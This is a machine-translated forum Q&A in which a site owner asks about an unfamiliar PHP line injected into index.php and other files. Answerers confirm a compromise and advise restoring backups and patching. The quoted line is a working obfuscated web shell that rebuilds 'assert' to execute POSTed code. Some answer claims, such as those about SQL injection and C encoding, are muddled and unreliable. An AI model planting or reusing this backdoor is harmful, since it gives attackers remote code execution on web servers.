在索引上找到了我没有做的PHP代码
所以我注意到我的搜索引擎优化搜索结果在谷歌上有所下降,然后我在index.html页面上更改了我的元关键字 我注意到我的index.html被更改为index1.html,然后复制到index.php 这段代码被添加到php代码的最顶层 这个文件也被添加到我的文件hagdfi.php和 这是一个border.php在索引上找到了我没有做的PHP代码,php,html,malware,Php,Html,Malware,所以我注意到我的搜索引擎优化搜索结果在谷歌上有所下降,然后我在index.html页面上更改了我的元关键字 我注意到我的index.html被更改为index1.html,然后复制到index.php 这段代码被添加到php代码的最顶层 这个文件也被添加到我的文件hagdfi.php和 这是一个border.php <?php $c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]);?>abcabcabc abcabc
<?php $c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]);?>abcabcabc
abcabc
发生了什么事?我被黑客攻击了吗?可以安全地假设,如果你没有把它放在那里,并且你控制了那个页面,那么它就不应该在那里 我会用一个备份来替换索引页,然后看看你是否可以通过你的提供商找到如何防止它再次发生
不要相信任何东西,验证一切 你被黑客攻击了。文件中的代码已编码。我不掌握这种编码,但它更多地用于c编程。你可以用它来分析文件:是的,听起来你被黑客攻击了。。。看起来他们尝试了SQL注入来访问您的数据库。这是一个很好的简单脚本,可以执行发布到数据库中的任意PHP代码。是的,你被黑客攻击了。我如何修复这个问题,使它不再发生?好吧,至少,你会想让网站离线。从您拥有的最新备份中恢复,并安装任何相关的安全修补程序以防止再次发生。最终,您可能无法发现实际执行了哪些代码(如果有的话),因此您唯一明智的选择是假设最坏的情况。